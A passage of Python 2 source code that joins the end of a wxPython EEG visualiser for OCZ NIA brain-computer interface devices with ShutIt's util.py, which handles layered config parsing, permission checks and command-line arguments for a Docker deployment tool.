    ys = [-1.0 + (2.0 * float(i) / float(row_count - 1)) for i in xrange(row_count)]
    columns = [[[x, y] for y in ys] for x in xs]
    # Interleave adjacent columns into quad-strip vertex lists.
    self.quadCols = [zip(columns[i], columns[i + 1])
                     for i in xrange(column_count - 1)]
    self.spectralColorColumHistory = [zip(self.colorlists[i], self.colorlists[i + 1])
                                      for i in xrange(column_count - 1)]
    # Only redraw when tab index 1 is selected — presumably this panel's tab; TODO confirm.
    if self.GetGrandParent().GetSelection() == 1:
        self.SetCurrent()
        self.OnDraw()
def spectralColor(self, v):
    """Map a scalar amplitude *v* to an [r, g, b] triple.

    Piecewise-linear ramp: black -> blue (0..0.2) -> magenta (..0.5)
    -> red (..1.5) -> yellow (..11.5) -> towards white above that.
    Components are not clamped to 1.0 for large *v*.
    """
    if v <= 0.0:
        return [0.0, 0.0, 0.0]
    if v <= 0.2:
        return [0.0, 0.0, v * 5.0]
    if v <= 0.5:
        return [(v - 0.2) / 0.3, 0.0, 1.0]
    if v <= 1.5:
        return [1.0, 0.0, 1.0 - (v - 0.5)]
    if v <= 11.5:
        return [1.0, (v - 1.5) * 0.05, 0.0]
    return [1.0, 1.0, (v - 11.5) * 0.008]
class SettingsPanel(wx.Panel):
    """Settings bar: sample-rate field plus per-EEG-band frequency-range editors."""
    def __init__(self, parent):
        wx.Panel.__init__(self, parent)
        # Samples-per-second field; committed when focus leaves the control.
        self.fpsField = wx.TextCtrl(self,value=str(settings.niaFPS))
        self.fpsField.Bind(wx.EVT_KILL_FOCUS, self.fpsChanged)
        panelSizer = wx.FlexGridSizer(0,10,0,0)
        panelSizer.AddGrowableCol(0)
        panelSizer.Add(wx.StaticText(self,label=""), 0, wx.ALIGN_CENTER, 5)
        panelSizer.Add(wx.StaticText(self,label="Samples per second:"), 0, wx.ALIGN_CENTER, 5)
        panelSizer.Add(self.fpsField, 0, wx.EXPAND, 5)
        panelSizer.AddGrowableCol(3)
        panelSizer.Add(wx.StaticText(self,label=""), 0, wx.ALIGN_CENTER, 5)
        # One choice entry per configurable EEG band (9 bands).
        self.bandChoice = wx.Choice(self,choices=[("EEG Band "+str(i)) for i in xrange(9)])
        panelSizer.Add(self.bandChoice, 0, wx.ALIGN_CENTER, 5)
        self.bandChoice.Bind(wx.EVT_CHOICE, self.bandChanged)
        # Lower/upper bound (Hz) of the currently selected band.
        self.fromFreqField = wx.TextCtrl(self,value=str(settings.bands[0][0]))
        panelSizer.Add(self.fromFreqField, 0, wx.EXPAND, 5)
        self.fromFreqField.Bind(wx.EVT_KILL_FOCUS, self.freqChanged)
        panelSizer.Add(wx.StaticText(self,label="-"), 0, wx.ALIGN_CENTER, 5)
        self.toFreqField = wx.TextCtrl(self,value=str(settings.bands[0][1]))
        panelSizer.Add(self.toFreqField, 0, wx.EXPAND, 5)
        self.toFreqField.Bind(wx.EVT_KILL_FOCUS, self.freqChanged)
        panelSizer.Add(wx.StaticText(self,label="Hz"), 0, wx.ALIGN_CENTER, 5)
        panelSizer.AddGrowableCol(9)
        panelSizer.Add(wx.StaticText(self,label=""), 0, wx.ALIGN_CENTER, 5)
        self.SetSizer(panelSizer)
        self.SetAutoLayout(1)
    def fpsChanged(self, event):
        """Validate the FPS field, clamp to 1..50, and restart the sample timer."""
        val = 0
        try:
            val = int(self.fpsField.GetValue())
        except ValueError:
            # Non-numeric input: fall back to the current setting.
            val = settings.niaFPS
        if (val<1):
            val = 1
        elif (val>50):
            val = 50
        settings.niaFPS = val
        self.fpsField.SetValue(str(val))
        # Restart the timer so the new rate takes effect immediately.
        self.GetGrandParent().timer.Stop()
        bciDevice.setPoints(int(500.0/settings.niaFPS))
        self.GetGrandParent().timer.Start(int(1000.0/settings.niaFPS))
        event.Skip()
    def bandChanged(self, event):
        """Show the stored frequency range for the newly selected band."""
        i = self.bandChoice.GetSelection()
        self.fromFreqField.SetValue(str(settings.bands[i][0]))
        self.toFreqField.SetValue(str(settings.bands[i][1]))
        event.Skip()
    def freqChanged(self, event):
        """Validate and normalise the band range fields, then store the band.

        Both bounds are clamped to 0..100 Hz; bounds are swapped if reversed
        and widened so the resulting span is at least 2 Hz.
        """
        i = self.bandChoice.GetSelection()
        fr = 0
        try:
            fr = int(self.fromFreqField.GetValue())
        except ValueError:
            # Non-numeric input: fall back to the stored lower bound.
            fr = settings.bands[i][0]
        if (fr<0):
            fr = 0
        elif (fr>100):
            fr = 100
        to = 0
        try:
            to = int(self.toFreqField.GetValue())
        except ValueError:
            to = settings.bands[i][1]
        if (to<0):
            to = 0
        elif (to>100):
            to = 100
        # Normalise: swap if reversed, then widen a zero/one Hz span to 2 Hz.
        if to<fr:
            sw = fr
            fr = to
            to = sw
        elif to == fr:
            to = to+2
        if abs(to-fr)==1:
            to=to+1
        self.fromFreqField.SetValue(str(fr))
        self.toFreqField.SetValue(str(to))
        settings.bands[i] = (fr,to)
        event.Skip()
class GUIMain(wx.Frame):
    """Main window: menu, settings bar, and a notebook of visualisation tabs."""
    def __init__(self):
        wx.Frame.__init__(self,None,title="Triathlon Analyzer",size=(600,600))
        self.panel = wx.Panel(self, wx.ID_ANY)
        # Menu with Calibrate and Quit entries.
        MenuBar = wx.MenuBar()
        self.FileMenu = wx.Menu()
        item = self.FileMenu.Append(wx.ID_ANY, text="Calibrate")
        self.Bind(wx.EVT_MENU, self.OnCalibrate, item)
        item = self.FileMenu.Append(wx.ID_EXIT, text="Quit")
        self.Bind(wx.EVT_MENU, self.OnQuit, item)
        MenuBar.Append(self.FileMenu, "Menu")
        self.SetMenuBar(MenuBar)
        sizer = wx.FlexGridSizer(2,1,0,0)
        self.settingsPanel = SettingsPanel(self.panel)
        self.tabs = wx.Notebook(self.panel)
        # Each tab hosts one canvas; when OpenGL is unavailable (noGL) a
        # non-GL placeholder panel is used instead.
        rawvisualizationPanel = wx.Panel(self.tabs, wx.ID_ANY)
        rawvisualizationSizer = wx.FlexGridSizer(1,1,0,0)
        rawvisualizationSizer.AddGrowableRow(0)
        rawvisualizationSizer.AddGrowableCol(0)
        if noGL:
            self.rawvisualizationCanvas = WXElements.NoGLVisualizationPanel(rawvisualizationPanel)
        else:
            self.rawvisualizationCanvas = RawVisualizationPanel(rawvisualizationPanel)
        rawvisualizationSizer.Add(self.rawvisualizationCanvas , 1, wx.EXPAND)
        rawvisualizationPanel.SetSizer(rawvisualizationSizer)
        visualizationPanel = wx.Panel(self.tabs, wx.ID_ANY)
        visualizationSizer = wx.FlexGridSizer(1,1,0,0)
        visualizationSizer.AddGrowableRow(0)
        visualizationSizer.AddGrowableCol(0)
        if noGL:
            self.visualizationCanvas = WXElements.NoGLVisualizationPanel(visualizationPanel)
        else:
            self.visualizationCanvas = FFTVisualizationPanel(visualizationPanel)
        visualizationSizer.Add(self.visualizationCanvas , 1, wx.EXPAND)
        visualizationPanel.SetSizer(visualizationSizer)
        historyPanel = wx.Panel(self.tabs, wx.ID_ANY)
        historySizer = wx.FlexGridSizer(1,1,0,0)
        historySizer.AddGrowableRow(0)
        historySizer.AddGrowableCol(0)
        if noGL:
            self.historyCanvas = WXElements.NoGLVisualizationPanel(historyPanel)
        else:
            self.historyCanvas = FFTHistoryVisualizationPanel(historyPanel)
        historySizer.Add(self.historyCanvas , 1, wx.EXPAND)
        historyPanel.SetSizer(historySizer)
        spectogramPanel = wx.Panel(self.tabs, wx.ID_ANY)
        spectogramSizer = wx.FlexGridSizer(1,1,0,0)
        spectogramSizer.AddGrowableRow(0)
        spectogramSizer.AddGrowableCol(0)
        if noGL:
            self.spectogramCanvas = WXElements.NoGLVisualizationPanel(spectogramPanel)
        else:
            self.spectogramCanvas = SpectogramVisualizationPanel(spectogramPanel)
        spectogramSizer.Add(self.spectogramCanvas , 1, wx.EXPAND)
        spectogramPanel.SetSizer(spectogramSizer)
        # Tab order: Raw(0), Spectogram(1), EEG Bands(2), EEG Band History(3).
        self.tabs.AddPage(rawvisualizationPanel,"Raw")
        self.tabs.AddPage(spectogramPanel,"Spectogram")
        self.tabs.AddPage(visualizationPanel,"EEG Bands")
        self.tabs.AddPage(historyPanel,"EEG Band History")
        sizer.AddGrowableCol(0)
        sizer.Add(wx.StaticText(self.panel,label=""), 0, wx.ALIGN_CENTER, 5)
        sizer.Add(self.settingsPanel , 1, wx.EXPAND)
        sizer.Add(wx.StaticText(self.panel,label=""), 0, wx.ALIGN_CENTER, 5)
        sizer.AddGrowableRow(3)
        sizer.Add(self.tabs , 1, wx.EXPAND)
        self.panel.SetSizer(sizer)
        self.panel.SetAutoLayout(1)
        # Sampling timer; started by NiaEEGApp after construction.
        self.timer = wx.Timer(self, wx.ID_ANY)
        self.Bind(wx.EVT_TIMER, self.NiaUpdate, self.timer)
    def OnQuit(self, event):
        """Stop sampling and close the window."""
        self.timer.Stop()
        self.Close()
    def OnCalibrate(self, event):
        """Run calibration on all attached devices."""
        bciDevice.calibrateAll()
        event.Skip()
    def NiaUpdate(self, ev):
        """Timer tick: record/process device data, then refresh every canvas."""
        if bciDevice.deviceType == InputManager.OCZ_NIAx2:
            # Dual-device rig: record both devices on background threads.
            # NOTE(review): the record threads are started but never joined
            # before process() runs — confirm process() synchronises with
            # record() internally.
            data_thread = threading.Thread(target=bciDevice.record,args=([0]))
            data_thread2 = threading.Thread(target=bciDevice.record,args=([1]))
            data_thread.start()
            data_thread2.start()
            bciDevice.process(0)
            bciDevice.process(1)
        else:
            data_thread = threading.Thread(target=bciDevice.record,args=([0]))
            data_thread.start()
            bciDevice.process(0)
        self.rawvisualizationCanvas.newReading()
        self.spectogramCanvas.newReading()
        self.visualizationCanvas.newReading()
        self.historyCanvas.newReading()
        ev.Skip()
class NiaEEGApp(wx.App):
    """Application object: builds the main window and starts the sampling timer."""
    def __init__(self, redirect = False):
        # BUG FIX: 'redirect' was accepted but never forwarded to wx.App,
        # so callers could not control stdout/stderr redirection. Default
        # (False) matches the parameter's previous declared default.
        wx.App.__init__(self, redirect=redirect)
        self.mainWindow = GUIMain()
        self.mainWindow.Show(True)
        # Size each read and the timer interval from the configured rate.
        bciDevice.setPoints(int(500.0/settings.niaFPS))
        self.mainWindow.timer.Start(int(1000.0/settings.niaFPS))
if __name__ == "__main__":
    # Load application settings, then ask the user which capture device to use.
    settings = AppSettings()
    # NOTE(review): .keys()[0] relies on Python 2 dict.keys() returning a list.
    selection = WXElements.selection("Select your Device",InputManager.SupportedDevices.keys()[0],InputManager.SupportedDevices.keys())
    settings.deviceName = selection
    bciDevice = InputManager.BCIDevice(settings.deviceName)
    # Initialise GLUT before the wx app constructs any GL canvases.
    argcp = ''
    glutInit(argcp, sys.argv)
    niaEEGApp = NiaEEGApp()
    niaEEGApp.MainLoop()
|
util.py | #!/usr/bin/env python
"""ShutIt utility functions.
"""
#The MIT License (MIT)
#
#Copyright (C) 2014 OpenBet Limited
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
#of the Software, and to permit persons to whom the Software is furnished to do
#so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
#THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import sys
import argparse
import os
import stat
from ConfigParser import RawConfigParser
import time
import re
import imp
import shutit_global
from shutit_module import ShutItModule
import pexpect
import socket
import textwrap
import json
import binascii
import base64
import subprocess
import getpass
import StringIO
import glob
import hashlib
import urlparse
import urllib2
import shutil
import manhole
from shutit_module import ShutItFailException
import operator
import threading
# Built-in default configuration (INI-format text), kept verbatim as the
# baseline every other config layer is read on top of.
_default_cnf = '''
################################################################################
# Default core config file for ShutIt.
################################################################################
# Details relating to the target you are building to (container, ssh or bash)
[target]
# Root password for the target - replace with your chosen password
# If left blank, you will be prompted for a password
password:
# Hostname for the target - replace with your chosen target hostname
# (where applicable, eg docker container)
hostname:
force_repo_work:no
locale:en_US.UTF-8
# space separated list of ports to expose
# e.g. "ports:2222:22 8080:80" would expose container ports 22 and 80 as the
# host's 2222 and 8080 (where applicable)
ports:
# Name to give the docker container (where applicable).
# Empty means "let docker default a name".
name:
# Whether to remove the docker container when finished (where applicable).
rm:no
# Information specific to the host on which the build runs.
[host]
# Ask the user if they want shutit on their path
add_shutit_to_path: yes
# Folder with files you want to copy from in your build.
# Often a good idea to have a central folder for this per host
# in your /path/to/shutit/configs/`hostname`_`username`.cnf
# If set to blank, then defaults to /path/to/shutit/artifacts (preferred)
# If set to "artifacts", then defaults to the artifacts folder in the cwd.
artifacts_dir:
# Docker executable on your host machine
docker_executable:docker
# space separated list of dns servers to use
dns:
# Password for the username above on the host (only needed if sudo is needed)
password:
# Log file - will be set to 0600 perms, and defaults to /tmp/<YOUR_USERNAME>_shutit_log_<timestamp>
# A timestamp will be added to the end of the filename.
logfile:
# ShutIt paths to look up modules in separated by ":", eg /path1/here:/opt/path2/there
shutit_module_path:.
# Repository information
[repository]
# Whether to tag
tag:yes
# Whether to suffix the date to the tag
suffix_date:no
# Suffix format (default is epoch seconds (%s), but %Y%m%d_%H%M%S is an option if the length is ok with the index)
suffix_format:%s
# tag name
name:my_module
# Whether to tar up the docker image exported
export:no
# Whether to tar up the docker image saved
save:no
# Whether to push to the server
push:no
# User on registry to namespace repo - can be set to blank if not docker.io
user:
#Must be set if push is true/yes and user is not blank
password:YOUR_INDEX_PASSWORD_OR_BLANK
#Must be set if push is true/yes and user is not blank
email:YOUR_INDEX_EMAIL_OR_BLANK
# repository server
# make blank if you want this to be sent to the main docker index on docker.io
server:
# tag suffix, defaults to "latest", eg registry/username/repository:latest.
# empty is also "latest"
tag_name:latest
# Root setup script
# Each module should set these in a config
[shutit.tk.setup]
shutit.core.module.build:yes
# Modules may rely on the below settings, only change for debugging.
do_update:yes
[shutit.tk.conn_bash]
# None
[shutit.tk.conn_ssh]
# Required
ssh_host:
# All other configs are optional
ssh_port:
ssh_user:
password:
ssh_key:
# (what to execute on the target to get a root shell)
ssh_cmd:
# Aspects of build process
[build]
build_log:yes
# How to connect to target
conn_module:shutit.tk.conn_docker
# Run any docker container in privileged mode
privileged:no
# lxc-conf arg, eg
#lxc_conf:lxc.aa_profile=unconfined
lxc_conf:
# Base image can be over-ridden by --image_tag defaults to this.
base_image:ubuntu:14.04
# Whether to perform tests.
dotest:yes
# --net argument to docker, eg "bridge", "none", "container:<name|id>" or "host". Empty means use default (bridge).
net:
'''
class LayerConfigParser(RawConfigParser):
    """RawConfigParser that remembers each source it read as a separate layer.

    The merged view behaves like a normal RawConfigParser (later reads
    override earlier ones); self.layers additionally keeps one isolated
    parser per source so we can report where a value was set (whereset),
    collect all values across sources (get_config_set) and re-read
    everything (reload).
    """
    def __init__(self):
        RawConfigParser.__init__(self)
        # List of (parser, filename, fp) tuples, one per source, in read order.
        # fp is None for sources read from a path rather than a file object.
        self.layers = []
    def read(self, filenames):
        """Read one or more files by path, recording each as its own layer."""
        if type(filenames) is not list:
            filenames = [filenames]
        for filename in filenames:
            # Parse into a private parser so this layer stays isolated.
            cp = RawConfigParser()
            cp.read(filename)
            self.layers.append((cp, filename, None))
        return RawConfigParser.read(self, filenames)
    def readfp(self, fp, filename=None):
        """Read a file-like object, keeping fp in the layer so reload() can re-read it."""
        cp = RawConfigParser()
        fp.seek(0)
        cp.readfp(fp, filename)
        self.layers.append((cp, filename, fp))
        # Rewind so the merged parse below sees the whole stream too.
        fp.seek(0)
        ret = RawConfigParser.readfp(self, fp, filename)
        return ret
    def whereset(self, section, option):
        """Return the filename of the most recently read layer that set [section]/option."""
        for cp, filename, fp in reversed(self.layers):
            if cp.has_option(section, option):
                return filename
        raise ShutItFailException('[%s]/%s was never set' % (section, option))
    def get_config_set(self, section, option):
        """Returns a set with each value per config file in it.
        """
        values = set()
        for cp, filename, fp in self.layers:
            if cp.has_option(section, option):
                values.add(cp.get(section, option))
        return values
    def reload(self):
        """
        Re-reads all layers again. In theory this should overwrite all the old
        values with any newer ones.
        It assumes we never delete a config item before reload.
        """
        oldlayers = self.layers
        # read()/readfp() below re-append each layer, rebuilding the list.
        self.layers = []
        for cp, filename, fp in oldlayers:
            if fp is None:
                self.read(filename)
            else:
                self.readfp(fp, filename)
    def remove_section(self, *args, **kwargs):
        # Mutation is disabled: layers would silently fall out of sync.
        raise NotImplementedError('Layer config parsers aren\'t directly mutable')
    def remove_option(self, *args, **kwargs):
        raise NotImplementedError('Layer config parsers aren\'t directly mutable')
    def set(self, *args, **kwargs):
        raise NotImplementedError('Layer config parsers aren\'t directly mutable')
def is_file_secure(file_name):
    """Returns false if file is considered insecure, true if secure.
    If file doesn't exist, it's considered secure!
    """
    if not os.path.isfile(file_name):
        return True
    # Any group/other read, write or execute bit makes the file insecure.
    group_other_bits = (stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP |
                        stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)
    return not (os.stat(file_name).st_mode & group_other_bits)
def colour(code, msg):
    """Colourize the given string for a terminal.

    Wraps *msg* in the ANSI SGR escape for *code* and a trailing reset.
    """
    start = '\033[%sm' % code
    reset = '\033[0m'
    return start + ('%s' % msg) + reset
def get_configs(shutit, configs):
    """Reads config files in, checking their security first
    (in case passwords/sensitive info is in them).

    configs - list of config file paths and/or (filename, fp) tuples.
    Returns a LayerConfigParser over all of them; may recurse once after
    fixing insecure file permissions, or call shutit.fail() if the user
    declines the fix.
    """
    cp = LayerConfigParser()
    fail_str = ''
    files = []
    # First pass: collect any group/other-accessible config files.
    for config_file in configs:
        if type(config_file) is tuple:
            # In-memory (filename, fp) configs have no on-disk permissions.
            continue
        if not is_file_secure(config_file):
            fail_str = fail_str + '\nchmod 0600 ' + config_file
            files.append(config_file)
    if fail_str != '':
        if shutit.cfg['build']['interactive'] > 0:
            fail_str = 'Files are not secure, mode should be 0600. Running the following commands to correct:\n' + fail_str + '\n'
            # Actually show this to the user before failing...
            shutit.log(fail_str, force_stdout=True)
            shutit.log('\n\nDo you want me to run this for you? (input y/n)\n', force_stdout=True)
        # Non-interactive builds fix permissions automatically.
        if shutit.cfg['build']['interactive'] == 0 or util_raw_input(shutit=shutit,default='y') == 'y':
            for f in files:
                shutit.log('Correcting insecure file permissions on: ' + f, force_stdout=True)
                # 0o600 (was py2-only literal 0600): owner read/write only.
                os.chmod(f, 0o600)
            # recurse
            return get_configs(shutit, configs)
        # User declined the fix: abort the build.
        shutit.fail(fail_str)
    # Second pass: everything is secure; read sources in order, so later
    # entries override earlier ones.
    for config in configs:
        if type(config) is tuple:
            cp.readfp(config[1], filename=config[0])
        else:
            cp.read(config)
    # Treat allowed_images as a special, additive case
    shutit.cfg['build']['shutit.core.module.allowed_images'] = cp.get_config_set('build', 'shutit.core.module.allowed_images')
    return cp
def issue_warning(msg, wait):
    """Issues a warning to stderr, then sleeps for *wait* seconds.

    Uses sys.stderr.write instead of the Python-2-only 'print >>' chevron
    syntax; output (message plus newline) is identical, and the function
    is now also valid Python 3.
    """
    sys.stderr.write('%s\n' % (msg,))
    time.sleep(wait)
def get_base_config(cfg, cfg_parser):
    """Populate *cfg* with core, sanity-checked configuration.

    Reads the [build], [target], [host] and [repository] sections from
    *cfg_parser*, fills in derived values (logfile path, docker image,
    module caches) and calls sys.exit() on combinations that cannot work
    together. Mutates *cfg* in place; returns None.
    """
    cfg['config_parser'] = cp = cfg_parser
    # BEGIN Read from config files
    cfg['build']['privileged'] = cp.getboolean('build', 'privileged')
    cfg['build']['lxc_conf'] = cp.get('build', 'lxc_conf')
    cfg['build']['build_log'] = cp.getboolean('build', 'build_log')
    cfg['build']['base_image'] = cp.get('build', 'base_image')
    cfg['build']['build_db_dir'] = '/root/shutit_build'
    # NOTE(review): 'dotest' is read with get() rather than getboolean(), so
    # it stays a string and even 'no' is truthy — confirm consumers compare
    # against the string before changing this.
    cfg['build']['dotest'] = cp.get('build', 'dotest')
    cfg['build']['net'] = cp.get('build', 'net')
    cfg['build']['completed'] = False
    cfg['build']['step_through'] = False
    cfg['build']['check_exit'] = True
    # Take a command-line arg if given, else default.
    if cfg['build']['conn_module'] is None:
        cfg['build']['conn_module'] = cp.get('build', 'conn_module')
    # Track logins in a stack and details in logins.
    cfg['build']['login_stack'] = []
    cfg['build']['logins'] = {}
    # Whether to accept default configs
    cfg['build']['accept_defaults'] = None
    cfg['target']['password'] = cp.get('target', 'password')
    cfg['target']['hostname'] = cp.get('target', 'hostname')
    cfg['target']['force_repo_work'] = cp.getboolean('target', 'force_repo_work')
    cfg['target']['locale'] = cp.get('target', 'locale')
    cfg['target']['ports'] = cp.get('target', 'ports')
    cfg['target']['name'] = cp.get('target', 'name')
    cfg['target']['rm'] = cp.getboolean('target', 'rm')
    cfg['target']['stty_cols'] = 320
    # installed and removed cache
    cfg['target']['modules_installed'] = []      # has been installed (in this build or previously)
    cfg['target']['modules_not_installed'] = []  # modules _known_ not to be installed
    cfg['target']['modules_ready'] = []          # has been checked for readiness and is ready (in this build)
    # installed file info
    cfg['target']['modules_recorded'] = []
    cfg['target']['modules_recorded_cache_valid'] = False
    # Directory to revert to when delivering in bash and reversion to context required.
    cfg['target']['module_root_dir'] = '/'
    cfg['host']['add_shutit_to_path'] = cp.getboolean('host', 'add_shutit_to_path')
    cfg['host']['artifacts_dir'] = cp.get('host', 'artifacts_dir')
    cfg['host']['docker_executable'] = cp.get('host', 'docker_executable')
    cfg['host']['dns'] = cp.get('host', 'dns')
    cfg['host']['password'] = cp.get('host', 'password')
    cfg['host']['logfile'] = cp.get('host', 'logfile')
    cfg['host']['shutit_module_path'] = cp.get('host', 'shutit_module_path').split(':')
    cfg['repository']['name'] = cp.get('repository', 'name')
    cfg['repository']['server'] = cp.get('repository', 'server')
    cfg['repository']['push'] = cp.getboolean('repository', 'push')
    cfg['repository']['tag'] = cp.getboolean('repository', 'tag')
    cfg['repository']['export'] = cp.getboolean('repository', 'export')
    cfg['repository']['save'] = cp.getboolean('repository', 'save')
    cfg['repository']['suffix_date'] = cp.getboolean('repository', 'suffix_date')
    cfg['repository']['suffix_format'] = cp.get('repository', 'suffix_format')
    cfg['repository']['user'] = cp.get('repository', 'user')
    cfg['repository']['password'] = cp.get('repository', 'password')
    cfg['repository']['email'] = cp.get('repository', 'email')
    cfg['repository']['tag_name'] = cp.get('repository', 'tag_name')
    # END Read from config files
    # BEGIN Standard expects
    # It's important that these have '.*' in them at the start, so that the matched data is reliablly 'after' in the
    # child object. Use these where possible to make things more consistent.
    # Attempt to capture any starting prompt (when starting) with this regexp.
    cfg['expect_prompts']['base_prompt'] = '\r\n.*[@#$] '
    # END Standard expects
    # BEGIN tidy configs up
    if cfg['host']['artifacts_dir'] == 'artifacts':
        cfg['host']['artifacts_dir'] = os.path.join(shutit_global.cwd, 'artifacts')
    elif cfg['host']['artifacts_dir'] == '':
        cfg['host']['artifacts_dir'] = os.path.join(shutit_global.shutit_main_dir, 'artifacts')
    if cfg['host']['logfile'] == '':
        logfile = os.path.join('/tmp/', 'shutit_log_' + cfg['build']['build_id'])
    else:
        # BUG FIX: this branch previously read the unbound local 'logfile'
        # ('logfile = logfile + ...'), raising UnboundLocalError whenever
        # [host]/logfile was set; suffix the configured path instead.
        logfile = cfg['host']['logfile'] + '_' + cfg['build']['build_id']
    cfg['host']['logfile'] = logfile
    if cfg['build']['build_log']:
        cfg['build']['build_log'] = open(logfile, 'a')
        # Lock it down to the running user (0o600, was py2-only literal 0600).
        os.chmod(logfile, 0o600)
    # delivery method bash and image_tag make no sense
    if cfg['build']['delivery'] in ('bash','ssh'):
        if cfg['target']['docker_image'] != '':
            print('delivery method specified (' + cfg['build']['delivery'] + ') and image_tag argument make no sense')
            sys.exit()
    if cfg['target']['docker_image'] == '':
        cfg['target']['docker_image'] = cfg['build']['base_image']
    # END tidy configs up
    # BEGIN warnings
    # Warn if something appears not to have been overridden
    warn = ''
    # NOTE(review): the password warning below is commented out, so 'warn'
    # is always '' and the debug config dump further down never fires.
    #if cfg['target']['password'][:5] == 'YOUR_':
    #	warn = '# Found ' + cfg['target']['password'] + ' in your config, you may want to quit and override, eg put the following into your\n# ' + shutit_global.cwd + '/configs/' + socket.gethostname() + '_' + cfg['host']['real_user'] + '.cnf file (create if necessary):\n\n[target]\n#root password for the target host\npassword:mytargethostpassword\n\n'
    #	issue_warning(warn,2)
    # FAILS begins
    # rm is incompatible with repository actions
    if cfg['target']['rm'] and (cfg['repository']['tag'] or cfg['repository']['push'] or cfg['repository']['save'] or cfg['repository']['export']):
        print("Can't have [target]/rm and [repository]/(push/save/export) set to true")
        sys.exit()
    if warn != '' and cfg['build']['debug']:
        issue_warning('Showing config as read in. This can also be done by calling with list_configs:',2)
        shutit_global.shutit.log(print_config(cfg), force_stdout=True, code='31')
        time.sleep(1)
    if cfg['target']['hostname'] != '' and cfg['build']['net'] != '' and cfg['build']['net'] != 'bridge':
        print('\n\ntarget/hostname or build/net configs must be blank\n\n')
        sys.exit()
    # FAILS ends
def parse_args(shutit):
    """Responsible for parsing arguments.

    Mutates shutit.cfg in place: fills cfg['action'], cfg['build'],
    cfg['repository'], cfg['target'] etc. from the command line. For the
    'skeleton' action it fills cfg['skeleton'] and returns early.

    TODO: precedence of configs documented
    Environment variables:
    SHUTIT_OPTIONS:
    Loads command line options from the environment (if set).
    Behaves like GREP_OPTIONS:
    - space separated list of arguments
    - backslash before a space escapes the space separation
    - backslash before a backslash is interpreted as a single backslash
    - all other backslashes are treated literally
    eg ' a\ b c\\ \\d \\\e\' becomes '', 'a b', 'c\', '\d', '\\e\'
    SHUTIT_OPTIONS is ignored if we are creating a skeleton
    """
    cfg = shutit.cfg
    # Record the numeric uid of the real invoking user (via `id -u`).
    cfg['host']['real_user_id'] = pexpect.run('id -u ' + cfg['host']['real_user']).strip()
    # These are in order of their creation
    actions = ['build', 'list_configs', 'list_modules', 'list_deps', 'serve', 'skeleton']
    # COMPAT 2014-05-15 - build is the default if there is no action specified
    # and we've not asked for help and we've called via 'shutit_main.py'
    if len(sys.argv) == 1 or (len(sys.argv) > 1 and sys.argv[1] not in actions
            and '-h' not in sys.argv and '--help' not in sys.argv
            and os.path.basename(sys.argv[0]) == 'shutit_main.py'):
        sys.argv.insert(1, 'build')
    # Pexpect documentation says systems have issues with pauses < 0.05
    def check_pause(value):
        # argparse type-checker: reject pauses below pexpect's safe minimum.
        ivalue = float(value)
        if ivalue < 0.05:
            raise argparse.ArgumentTypeError(
                "%s is an invalid pause (must be >= 0.05)" % value)
        return ivalue
    parser = argparse.ArgumentParser(description='ShutIt - a tool for managing complex Docker deployments.\n\nTo view help for a specific subcommand, type ./shutit <subcommand> -h',prog="ShutIt")
    parser.add_argument('--version', action='version', version='%(prog)s 0.7')
    subparsers = parser.add_subparsers(dest='action', help='''Action to perform - build=deploy to target, serve=run a shutit web server, skeleton=construct a skeleton module, list_configs=show configuration as read in, list_modules=show modules available, list_deps=show dep graph ready for graphviz. Defaults to 'build'.''')
    # One sub-parser per action; action-specific options are attached below.
    sub_parsers = dict()
    for action in actions:
        sub_parsers[action] = subparsers.add_parser(action)
    # 'skeleton' takes a distinct positional/option set from all other actions.
    sub_parsers['skeleton'].add_argument('module_directory', help='Absolute path to new directory for module')
    sub_parsers['skeleton'].add_argument('module_name', help='Name for your module. Single word and lower case, eg: mymysql')
    sub_parsers['skeleton'].add_argument('domain', help='Arbitrary but unique domain for namespacing your module, eg com.mycorp')
    sub_parsers['skeleton'].add_argument('--depends', help='Module id to depend on, default shutit.tk.setup (optional)', default='shutit.tk.setup')
    sub_parsers['skeleton'].add_argument('--base_image', help='FROM image, default ubuntu:14.04 (optional)', default='ubuntu:14.04')
    sub_parsers['skeleton'].add_argument('--script', help='Pre-existing shell script to integrate into module (optional)', nargs='?', default=None)
    sub_parsers['skeleton'].add_argument('--example', help='Add an example implementation with model calls to ShutIt API (optional)', default=False, const=True, action='store_const')
    sub_parsers['skeleton'].add_argument('-d', '--dockerfile', default=None)
    # Repository-related flags only make sense for 'build'.
    sub_parsers['build'].add_argument('--export', help='Perform docker export to a tar file', const=True, default=False, action='store_const')
    sub_parsers['build'].add_argument('--save', help='Perform docker save to a tar file', const=True, default=False, action='store_const')
    sub_parsers['build'].add_argument('--push', help='Push to a repo', const=True, default=False, action='store_const')
    sub_parsers['list_configs'].add_argument('--history', help='Show config with history', const=True, default=False, action='store_const')
    sub_parsers['list_modules'].add_argument('--long', help='Show extended module info, including ordering', const=True, default=False, action='store_const')
    sub_parsers['list_modules'].add_argument('--sort', help='Order the modules seen, default to module id', default='id', choices=('id','run_order'))
    # Options shared by every action except 'skeleton'.
    for action in ['build', 'serve', 'list_configs', 'list_modules', 'list_deps']:
        sub_parsers[action].add_argument('--config', help='Config file for setup config. Must be with perms 0600. Multiple arguments allowed; config files considered in order.', default=[], action='append')
        sub_parsers[action].add_argument('-d','--delivery', help='Delivery method, aka target. "docker" container (default), configured "ssh" connection, "bash" session', default=None, choices=('docker','target','ssh','bash'))
        sub_parsers[action].add_argument('-s', '--set', help='Override a config item, e.g. "-s target rm no". Can be specified multiple times.', default=[], action='append', nargs=3, metavar=('SEC', 'KEY', 'VAL'))
